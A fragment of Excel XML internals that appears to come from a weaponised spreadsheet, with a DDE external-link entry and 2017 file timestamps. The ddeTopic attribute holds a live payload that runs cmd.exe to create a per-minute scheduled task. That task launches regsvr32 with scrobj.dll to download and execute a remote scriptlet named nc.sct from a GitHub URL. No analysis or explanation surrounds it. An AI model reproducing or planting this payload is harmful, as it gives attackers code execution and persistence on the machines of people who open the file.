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SEXCEL" ddeTopic="\..\..\..\Windows\System32\cmd.exe /c SchTasks.exe /Create /SC MINUTE /TN x /TR &quot;regsvr32 /s /n /u /i:https://raw.githubusercontent.com/riyantigomez/gomez22/master/nc.sct scrobj.dll&quot; /f ">
    <ddeItems>
      <ddeItem name="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e">
        <f>[1]!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2017-10-30T01:22:12Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-10-30T01:22:50Z</dcterms:modified>
</cp:coreProperties>
</file>